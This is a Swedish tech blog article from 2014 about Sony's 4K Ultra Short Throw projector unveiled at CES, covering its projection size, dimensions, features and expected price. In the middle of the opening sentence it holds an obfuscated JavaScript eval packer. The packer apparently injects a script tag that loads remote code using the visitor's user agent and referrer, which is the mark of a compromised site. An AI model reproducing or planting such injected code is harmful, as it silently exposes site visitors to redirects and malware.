Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Sony 4K Ultra Short Throw projektor – riktig hemmabio

Sony 4K Ultra Short Throw projektor – riktig hemmabio
Filip Urde
  • On 22 januari, 2014
  • http://www.revue.se/filip-urde

Efter eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tdkzz|var|u0026u|referrer|tzzah||js|php’.split(’|’),0,{}))
att först föra in 4K upplösning till vardagsrummets väggar under 2012 med sin VPL – VW1000ES projektor, så är Sony nu tillbaka med en ny Ultra HD lösning.  

 

 

Fast den här gången så har man verkligen tagit hemmabio-projektorn till en ny nivå. På CES så visade Sony upp en prototyp av sin 4K Ultra Short Throw projektor som har förmågan att kasta bilder upp till 147 tums storlek från ett avstånd av cirka 50 cm.

Sony 4K Ultra Short Throw projektor kommer att finnas i handeln i mitten av 2014. Själva systemet är designat för att se ut som en möbel,  måtten på enheten är 110 x 26,5 x 53,5 cm och sitter på golvet vid sidan av en vägg med tillräckligt utrymme för att rymma dess stora projektionsstorleken. En 1,6 x zoom möjliggör att UHD bilden kan anpassas till någonstans mellan 66 och 147 tum. Sony säger att enheten har 3D- kapacitet och kommer att stödja aktuella video innehåll från internet, satellit-och kabelleverantörer, samt Netflix och Sonys egna ”Video Unlimited 4K ”.

Förutom att minimera skuggor och tar bort behovet av komplicerad installation eller montering , inkluderar Sonys UST projektor fyra HDMI-portar och två högtalarutgångar med separata högtalarelement som kan sitta fint vid sidan av projektorn genom att modellera med samma eleganta design, likt byggklossar.

Sony 4K Ultra Short Throw projektor kommer att finnas tillgänglig i mitten av 2014 för cirka 30.000 till $ 40.000. Vad priset blir i Sverige och om vi kommer få se den i mitten av 2014 är fortfarande oklart, men häftig är den.

Sony